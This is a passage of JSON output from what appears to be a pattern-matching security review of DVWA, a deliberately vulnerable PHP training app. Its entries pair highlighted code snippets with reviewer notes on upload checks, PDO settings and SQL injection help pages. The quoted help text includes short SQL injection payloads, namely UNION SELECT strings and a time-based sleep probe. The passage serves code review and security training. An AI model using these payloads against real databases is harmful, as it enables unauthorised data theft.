class=\"line-number\">24:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">25:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token 
string\">'image/jpeg'</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">'image/png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>",
  "line": 20,
  "start": 15,
  "end": 26,
  "severity": "unknown",
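  "note": "md5() on this line only derives a temp-file name from uniqid() and the uploaded file name; it is not used as a password hash or an integrity check, so the weak-hash pattern does not apply here. uniqid() is time-based, so the resulting name should not be relied on as unpredictable. The uploaded extension is appended to the name unchanged, so the extension allow-list on line 23 is the control that matters."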
 },
 {
  "id": 26,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\sprepare",
  "match": "<span class=\"line-number\">463:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS_connError</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">464:</span> \t\t\t<span class=\"token function\">dvwaLogout</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">465:</span> \t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Unable to connect to the database.&lt;br />'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$DBMS_errorFunc</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">466:</span> \t\t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">467:</span> \t\t}\n<span class=\"highlight\"><span class=\"line-number\">468:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> MySQL PDO Prepared Statements <span class=\"token punctuation\">(</span><span class=\"token keyword\">for</span> impossible levels<span class=\"token punctuation\">)</span></span>\n<span class=\"line-number\">469:</span> \t\t<span class=\"token variable\">$db</span> <span class=\"token operator\">=</span> new <span class=\"token function\">PDO</span><span class=\"token punctuation\">(</span><span 
class=\"token string\">'mysql:host='</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_server'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>'<span class=\"token comment\" spellcheck=\"true\">;dbname=' . $_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]);</span>\n<span class=\"line-number\">470:</span> \t\t<span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">setAttribute</span><span class=\"token punctuation\">(</span>PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ATTR_ERRMODE<span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ERRMODE_EXCEPTION<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">471:</span> \t\t<span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">setAttribute</span><span class=\"token punctuation\">(</span>PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ATTR_EMULATE_PREPARES<span class=\"token punctuation\">,</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">472:</span> \t}\n<span class=\"line-number\">473:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span> <span class=\"token punctuation\">)</span> {",
  "line": 468,
  "start": 463,
  "end": 474,
  "severity": "unknown",
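  "note": "The pattern hit the comment on line 468, not a prepare() call. The PDO handle created on lines 469-471 sets ERRMODE_EXCEPTION and turns ATTR_EMULATE_PREPARES off, so statements prepared on it are bound by the MySQL server rather than interpolated by the client library. Review the call sites that use $db for the actual queries."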
 },
 {
  "id": 228,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">&lt;</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\">&lt;</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">&lt;</span>td<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span 
class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
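  "note": "Hit is in the static help page text (the About paragraph describing SQL injection), not in code that builds or runs a query. No finding for this line."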
 },
 {
  "id": 229,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>There are <span class=\"token number\">5</span> users <span class=\"token keyword\">in</span> the database<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> id's from <span class=\"token number\">1</span> <span class=\"token keyword\">to</span> <span class=\"token number\">5</span><span class=\"token punctuation\">.</span> Your mission<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">to</span> steal their passwords via SQLi<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span 
class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able</span>\n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span>a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&amp;Submit=Submit&lt;/span>.&lt;/pre></span>\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> ",
  "line": 25,
  "start": 20,
  "end": 31,
  "severity": "unknown",
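  "note": "Hit is in help-page prose for the low level, not in query code. The behaviour it describes, raw attacker-controlled input used in the SQL query, is what the level's own source file should be reviewed for."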
 },
 {
  "id": 230,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token 
operator\">=</span>a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&amp;Submit=Submit&lt;/span>.&lt;/pre></span>\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 26,
  "start": 21,
  "end": 32,
  "severity": "unknown",
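  "note": "Continuation of the low-level help paragraph that starts on line 25; documentation text, not query code."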
 },
 {
  "id": 231,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The medium level uses a form of SQL injection protection<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> the function of\n<span class=\"line-number\">33:</span> \t\t\t\"<span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.mysql-real-escape-string.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'mysql_real_escape_string()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>\".</span>\n<span class=\"highlight\"><span class=\"line-number\">34:</span> \t\t\tHowever due <span class=\"token keyword\">to</span> the SQL query <span class=\"token operator\">not</span> having quotes around the parameter<span class=\"token punctuation\">,</span> this will <span class=\"token operator\">not</span> fully protect the query from being altered<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">35:</span> \n<span class=\"line-number\">36:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token 
operator\">></span>The text box has been replaced <span class=\"token keyword\">with</span> a pre<span class=\"token operator\">-</span>defined dropdown list <span class=\"token operator\">and</span> uses POST <span class=\"token keyword\">to</span> submit the form<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span>a UNION <span class=\"token keyword\">SELECT</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token comment\" spellcheck=\"true\">;-- -&amp;Submit=Submit&lt;/span>.&lt;/pre></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
  "line": 34,
  "start": 29,
  "end": 40,
  "severity": "unknown",
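  "note": "Hit is in help-page prose, not query code. The point it makes is worth keeping in the review: escaping with mysql_real_escape_string() only protects values placed inside quotes, so an unquoted numeric parameter needs an integer cast or a bound parameter instead."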
 },
 {
  "id": 232,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>This is very similar <span class=\"token keyword\">to</span> the low level<span class=\"token punctuation\">,</span> however this time the attacker is inputting the value <span class=\"token keyword\">in</span> a different manner<span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">43:</span> \t\t\tThe input values are being transferred <span class=\"token keyword\">to</span> the vulnerable query via session variables using another page<span class=\"token punctuation\">,</span> rather than a direct GET request<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>ID<span class=\"token punctuation\">:</span> a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" 
spellcheck=\"true\">;-- -&amp;Submit=Submit&lt;/span>.&lt;/pre></span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 43,
  "start": 38,
  "end": 49,
  "severity": "unknown",
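  "note": "Hit is in help-page prose, not query code. It describes input reaching the query through session variables; values read from the session need the same treatment as direct request input when they end up in SQL."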
 },
 {
  "id": 233,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>ID<span class=\"token punctuation\">:</span> a' UNION <span class=\"token keyword\">SELECT</span> <span class=\"token string\">\"text1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"text2\"</span><span class=\"token comment\" spellcheck=\"true\">;-- -&amp;Submit=Submit&lt;/span>.&lt;/pre></span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \n<span class=\"line-number\">48:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">49:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The queries are now parameterized queries <span class=\"token punctuation\">(</span>rather than being dynamic<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> This means the query has been defined by the developer<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">50:</span> \t\t\t<span class=\"token operator\">and</span> has distinguish which sections are code<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> the rest is data<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token 
operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">51:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>td<span class=\"token operator\">></span>\n<span class=\"line-number\">52:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>table<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> ",
  "line": 49,
  "start": 44,
  "end": 55,
  "severity": "unknown",
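  "note": "Hit is in help-page prose describing the parameterized queries used at the impossible level; documentation text, not query code."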
 },
 {
  "id": 207,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">&lt;</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\">&lt;</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">&lt;</span>td<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>When an attacker executes SQL injection attacks<span class=\"token punctuation\">,</span> sometimes the server responds <span class=\"token keyword\">with</span> error messages from the database server complaining that the SQL query's syntax is incorrect<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tBlind SQL injection is identical <span class=\"token keyword\">to</span> normal SQL Injection except that when an attacker attempts <span class=\"token keyword\">to</span> exploit an 
application<span class=\"token punctuation\">,</span> rather <span class=\"token keyword\">then</span> getting a useful error message<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">11:</span> \t\t\tthey get a generic page specified by the developer instead<span class=\"token punctuation\">.</span> This makes exploiting a potential SQL Injection attack more difficult but <span class=\"token operator\">not</span> impossible<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">12:</span> \t\t\tAn attacker can still steal data by asking a series of <span class=\"token boolean\">True</span> <span class=\"token operator\">and</span> <span class=\"token boolean\">False</span> questions through SQL statements<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> monitoring how the web application response\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>valid entry retunred <span class=\"token operator\">or</span> <span class=\"token number\">404</span> header set<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 208,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">11:</span> \t\t\tthey get a generic page specified by the developer instead<span class=\"token punctuation\">.</span> This makes exploiting a potential SQL Injection attack more difficult but <span class=\"token operator\">not</span> impossible<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">12:</span> \t\t\tAn attacker can still steal data by asking a series of <span class=\"token boolean\">True</span> <span class=\"token operator\">and</span> <span class=\"token boolean\">False</span> questions through SQL statements<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> monitoring how the web application response\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>valid entry retunred <span class=\"token operator\">or</span> <span class=\"token number\">404</span> header set<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span><span class=\"token string\">\"time based\"</span> injection method is often used when there is no visible feedback <span class=\"token keyword\">in</span> how the page different <span class=\"token keyword\">in</span> its response <span class=\"token punctuation\">(</span>hence its a blind attack<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t \tThis means the attacker will wait <span class=\"token keyword\">to</span> see how long the page takes <span class=\"token keyword\">to</span> response back<span class=\"token punctuation\">.</span> <span class=\"token keyword\">If</span> it takes longer 
than normal<span class=\"token punctuation\">,</span> their query was successful<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Find the version of the SQL database software through a blind SQL attack<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 209,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/help/help.php",
  "filetype": "php",
  "search": "\\squery",
  "match": "<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Find the version of the SQL database software through a blind SQL attack<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token keyword\">to</span><span class=\"token operator\">-</span><span class=\"token keyword\">do</span> is escape the query <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span> they are able</span>\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token keyword\">to</span> execute any SQL query they wish<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token 
operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span>id<span class=\"token operator\">=</span><span class=\"token number\">1</span>' <span class=\"token operator\">AND</span> sleep <span class=\"token number\">5</span><span class=\"token operator\">&amp;</span>Submit<span class=\"token operator\">=</span>Submit<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> ",
  "line": 26,
  "start": 21,
  "end": 32,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 210,
